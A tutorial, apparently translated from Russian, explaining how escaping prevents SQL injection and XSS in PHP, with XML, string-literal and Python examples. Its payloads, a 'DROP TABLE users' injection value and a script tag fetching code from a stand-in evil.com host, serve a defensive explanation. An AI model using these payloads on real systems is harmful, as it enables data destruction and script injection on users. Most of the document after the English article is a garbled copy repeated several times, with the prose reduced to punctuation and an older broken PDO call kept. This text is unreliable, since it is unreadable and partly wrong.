SQL injection, cross-site request forgery, malicious XML... scary, scary things that we all want to protect ourselves from, but to do that you have to know why it all happens. This article explains the basic concept behind all of it: strings, and the processing of strings within strings.
The main problem
It is just text. Yes, just text, and that is the main problem. Almost everything in a computer system is represented by text (which in turn is represented by bytes). It is just that some text is meant for computers and other text for people. But both kinds are still text. To make clear what I am talking about, here is a small example:
<?xml version="1.0" encoding="UTF-8" ?>
<article>
    <author>Homo Sapiens</author>
    <contents>
        Suppose, there is the English text, which I don't wanna translate into Russian
    </contents>
</article>
Believe it or not: this is text. Some people call it XML, but it is just text. It may not be something you would show an English teacher, but it is still text. You can print it on a poster and carry it to a rally, you can write it in a letter to your mother... it is text.
However, we want some parts of this text to mean something to our computer. We want the computer to be able to extract the author of the text and the text itself separately, so that it can do something with them. For example, turn the above into this:
Suppose, there is the English text, which I don't wanna translate into Russian by Homo Sapiens
How does the computer know how to do that? Well, because we wrapped certain parts of the text in special words inside funny brackets, like <author>. Since we did that, we can write a program that looks for these special parts, extracts the text, and uses it for our own purposes.
In other words, we used certain rules to mark special meanings in our text, rules that anyone following the same conventions can recognize.
OK, none of this is hard to understand. But what if we want to use those funny brackets, which carry a special meaning in our text, without that special meaning?.. Something like this:
<?xml version="1.0" encoding="UTF-8" ?>
<article>
    <author>Homo Sapiens</author>
    <contents>
        Basic math tells us that if x < n and y > n, x cannot be larger than y.
    </contents>
</article>
The characters "<" and ">" are nothing special. They may legitimately be used anywhere in any text, as in the example above. But what about our idea of special words in brackets? How is the computer to tell which "<" starts a special word and which one is just part of the text? XML is only text, after all.
<?xml version="1.0" encoding="UTF-8" ?>
<article>
    <author>Homo Sapiens</author>
    <contents>
        Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y.
    </contents>
</article>
Here "<" has been replaced with "&lt;" and ">" with "&gt;": the sequences the parser would treat as special have been replaced with ones it does not, and when the text is extracted they are turned back into "<" and ">".
This operation is called escaping:
escape |iˈskāp| [ no obj. ] [...] [ with obj. ] [...] IT: [...]
What about the ampersand (&) itself? What if the text is supposed to contain a literal "&lt;"? In XML the escape character & is itself escaped, as "&amp;", so the literal text "&lt;" is written as "&amp;lt;".
XML is one example of this "problem"; string literals in a programming language have exactly the same one:
var name = "Homo Sapiens";
var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
The quotes mark where the string starts and ends; everything between them is plain text, so this is fine too:
var name = "Homo Sapiens";
var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
No problem! But what if the text itself contains a quote?
var name = "Homo Sapiens";
var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... Oops. The second quote ends the string, and the rest is a syntax error. The solution is the same as with XML: escape the character that has the special meaning, here with a backslash "\":
var name = "Homo Sapiens";
var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
The "\" tells the parser that the next quote is part of the text rather than the end of the string. But what if the text itself contains a "\"? Then it too has to be escaped, as "\\". Simple enough!
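As an added example (not from the original article), here is the backslash convention from the snippets above written out as code: a function that produces such a literal, a small parser that reads one back, and a deliberately incomplete escaper that forgets the backslash itself, which is the case the last question is about. The function names and the Windows-path sample are mine.

```python
# Added example, not from the original article: escaping a string literal
# with a backslash, and a parser that reads such a literal back.

ESCAPES = {'"': '\\"', '\\': '\\\\'}


def quote_literal(text: str) -> str:
    """Wrap text in double quotes, escaping the quote and the escape char."""
    body = ''.join(ESCAPES.get(ch, ch) for ch in text)
    return '"' + body + '"'


def quote_literal_naive(text: str) -> str:
    """Deliberately incomplete: escapes '"' but forgets the backslash itself."""
    return '"' + text.replace('"', '\\"') + '"'


def parse_literal(literal: str) -> str:
    """Read one double-quoted literal; raise ValueError if it is malformed.

    The parser is the "computer" of the article: it decides where the
    string ends by looking at the characters, so an unescaped '"' ends it
    early and a trailing backslash swallows the closing quote.
    """
    if len(literal) < 2 or literal[0] != '"':
        raise ValueError("literal must start with a double quote")
    out = []
    i = 1
    while i < len(literal):
        ch = literal[i]
        if ch == '\\':
            # escape character: the next character is taken literally
            if i + 1 >= len(literal):
                raise ValueError("dangling backslash before end of input")
            out.append(literal[i + 1])
            i += 2
            continue
        if ch == '"':
            # closing quote: anything after it is trailing junk
            if i != len(literal) - 1:
                raise ValueError("unexpected text after closing quote")
            return ''.join(out)
        out.append(ch)
        i += 1
    raise ValueError("unterminated string literal")


def round_trips(text: str, quoter=quote_literal) -> bool:
    """True if quoting text and parsing the result gives the text back."""
    try:
        return parse_literal(quoter(text)) == text
    except ValueError:
        return False


# the article's Plato quote, plus a constructed value ending in a backslash
PLATO = 'Plato is said to once have said "Lorem ipsum dolor sit amet".'
TRAILING_BACKSLASH = 'C:\\Users\\'

if __name__ == '__main__':
    for sample in (PLATO, TRAILING_BACKSLASH):
        print(quote_literal(sample), round_trips(sample))
        print(quote_literal_naive(sample),
              round_trips(sample, quote_literal_naive))
```

The naive escaper survives the Plato quote but breaks on the path: its last backslash escapes the closing quote, so the literal never ends.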
That is the whole idea. Whenever text is placed inside other text that gives certain characters a special meaning, those characters have to be escaped. The same applies to HTML: text placed in HTML has to be escaped for HTML, or the browser will read it as HTML.
The classic case is SQL. An SQL query is just text, for example:
SELECT phone_number FROM users WHERE name = 'Alex'
The database parses this text and executes it. In application code the SQL text is usually itself a string inside the program, in PHP for example:
$query = "SELECT phone_number FROM users WHERE name = 'Alex'";
$result = mysql_query($query);
So the SQL text sits inside the PHP text as a "string". PHP only sees a string and passes it to the database, which parses it as SQL. Nothing wrong with that so far.
Now suppose the name comes from the user, say from a web form. The naive way to build the query is:
$name = $_POST['name'];
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);
Look at what is happening: the user's text is inserted into the SQL text, which is inside the PHP text! Text within text within text!
The problem is that $_POST['name'] is raw text from the user, pasted into the SQL text without any escaping. The database sees only SQL; it has no way of knowing where the "name" ends.
What does that mean in practice? For a few different inputs, here are the resulting queries:
Input:  Alex
Query:  SELECT phone_number FROM users WHERE name = 'Alex'

Input:  Mc'Donalds
Query:  SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Input:  Joe'; DROP TABLE users; --
Query:  SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
Do you see the problem? In the second case the "name" contains an apostrophe, '. The string ends early and the query is a syntax error! The third case is worse: the apostrophe ends the string, and what follows is read as more SQL. And the users table?...
Let's look closer... The database sees three things: select the phone number for Joe; drop the users table; and a comment (which hides the leftover '). It executes them in order.
This is SQL injection: text that was meant as data is read as SQL, because it was inserted into the SQL text without being escaped. As far as the database is concerned, the "name" was never a name, only more text.
The same problem in another guise: XSS. This time the text is HTML.
Suppose we run a forum or a blog where users post messages, and each post is rendered with a PHP template like this:
<div class="post">
    <p class="meta">
        Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?>
    </p>
    <p class="body">
        <?php echo $post['body']; ?>
    </p>
</div>
With ordinary posts it produces something like:
<div class="post">
    <p class="meta">
        Posted by Plato on January 2, 15:31
    </p>
    <p class="body">
        I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat."
    </p>
</div>
Another post, this time with "<" and ">" in the text:
<div class="post">
    <p class="meta">
        Posted by Pascal on November 23, 04:12
    </p>
    <p class="body">
        Basic math tells us that if x < n and y > n, x cannot be larger than y.
    </p>
</div>
... Hm. That one may or may not render the way Pascal intended. But what about this one?
<div class="post">
    <p class="meta">
        Posted by JackTR on July 18, 12:56
    </p>
    <p class="body">
        <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>
    </p>
</div>
Do you see what happens? The "post" contains a script tag, and the browser loads and runs JavaScript from another site for every visitor of the page. The text has become code.
It is exactly the same problem as with SQL: user text was inserted into HTML text without escaping! The browser cannot tell the "post" apart from the page's own markup. So what is the solution?
Ban certain characters? Filter the text for "dangerous" words? No: escaping!
Back to SQL first. PHP's old mysql extension (removed in PHP 7) offers a function for exactly this:
$name = $_POST['name'];
$name = mysql_real_escape_string($name);
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);
It escapes the characters that are special inside an SQL string literal, so that the "name" stays a name. The same three inputs now give:
Input:  Alex
Query:  SELECT phone_number FROM users WHERE name = 'Alex'

Input:  Mc'Donalds
Query:  SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Input:  Joe'; DROP TABLE users; --
Query:  SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string has put a backslash before each apostrophe, and the database reads \' as a literal apostrophe inside the string rather than as its end. The second name is looked up correctly, and the third input is looked up as one long, strange name; nothing is dropped.
And the same thing for HTML:
<div class="post">
    <p class="meta">
        Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?>
    </p>
    <p class="body">
        <?php echo htmlspecialchars($post['body']); ?>
    </p>
</div>
htmlspecialchars replaces the characters that are special in HTML (&, <, > and quotes) with their entities. The malicious post now comes out as:
<div class="post">
    <p class="meta">
        Posted by JackTR on July 18, 12:56
    </p>
    <p class="body">
        &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
    </p>
</div>
The browser now shows the text of the "post" literally instead of reading it as HTML.
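The two fixes above (entities for XML, htmlspecialchars for HTML) as an added Python example that is not part of the original article: the article's <article> document and the forum post are built with and without escaping, and the XML is parsed back to show that escaping is what makes the original text recoverable. Python's html.escape stands in for htmlspecialchars; the function names are mine.

```python
# Added example, not from the original article: escaping text for XML/HTML
# with entities and parsing the result back. Standard library only.
import html
import xml.etree.ElementTree as ET

# The article's <article> data: contents with "<" and ">" in the prose.
AUTHOR = "Homo Sapiens"
CONTENTS = ("Basic math tells us that if x < n and y > n, "
            "x cannot be larger than y.")

# The forum post from the article whose body is markup rather than prose.
SCRIPT_POST = ('<script src="http://evil.com/dangerous.js" '
               'type="text/javascript" charset="utf-8"></script>')


def escape_for_markup(text: str) -> str:
    """Replace the characters that are special in XML/HTML with entities.

    The escape character & is escaped too, which is what makes this
    reversible: a literal "&lt;" in the text becomes "&amp;lt;".
    """
    return html.escape(text, quote=True)


def build_article(author: str, contents: str, escape: bool = True) -> str:
    """The article's XML format, with or without escaping the embedded text."""
    esc = escape_for_markup if escape else (lambda s: s)
    return ('<?xml version="1.0" encoding="UTF-8" ?>\n'
            '<article>\n'
            f'  <author>{esc(author)}</author>\n'
            f'  <contents>{esc(contents)}</contents>\n'
            '</article>\n')


def extract_article(xml_text: str):
    """Parse the XML and return (author, contents), or None if malformed.

    The parser is the "computer" of the article: an unescaped "<" in the
    contents looks like the start of a tag and the document fails to parse.
    """
    try:
        root = ET.fromstring(xml_text.encode("utf-8"))
    except ET.ParseError:
        return None
    return root.findtext("author"), root.findtext("contents")


def render_post(username: str, body: str, escape: bool = True) -> str:
    """The article's post template, with and without htmlspecialchars."""
    esc = escape_for_markup if escape else (lambda s: s)
    return ('<div class="post">\n'
            f'  <p class="meta">Posted by {esc(username)}</p>\n'
            f'  <p class="body">{esc(body)}</p>\n'
            '</div>\n')


def contains_tag(html_text: str, tag: str) -> bool:
    """True if the rendered HTML contains a real <tag ...> start tag."""
    return f"<{tag}" in html_text.lower()


if __name__ == "__main__":
    print(extract_article(build_article(AUTHOR, CONTENTS)))
    print(extract_article(build_article(AUTHOR, CONTENTS, escape=False)))
    print(render_post("JackTR", SCRIPT_POST))
```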
So the rule is: whenever you put text inside other text, escape it for the format it is going into. Into SQL, escape for SQL. Into HTML, escape for HTML. (Into a string literal, escape for that language's string literals.) Every format has its own escaping rules.
Finally, a few things that are often confused with escaping but are not the same:
Validation
Validation checks that the input is what you expect. A name may well be "DROP TABLE users" if that is what the user typed, but an age can only be a number such as "42". Validation is about the meaning of the data, not about HTML/SQL special characters; it is not "escaping" and does not replace it.
Sanitization
Sanitization "cleans" the input by removing or changing parts of it, for instance stripping HTML tags from a post. That is not escaping either: it changes the data, whereas escaping keeps the data and only changes how it is written down.
Prepared SQL statements
Prepared statements avoid the problem altogether: the SQL text and the data are sent to the database separately, so they never have to be mixed. In PHP with PDO:
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);  // execute() takes an array of parameter values
The database receives the query and the parameter separately, so the name is never parsed as SQL and nothing has to be escaped.
That's all. Whenever text is put inside other text (with its own rules), escape it (for that format). Remember that "text" is everywhere, and the rules depend on where the text is going: escape for SQL when building SQL (and for HTML when building HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
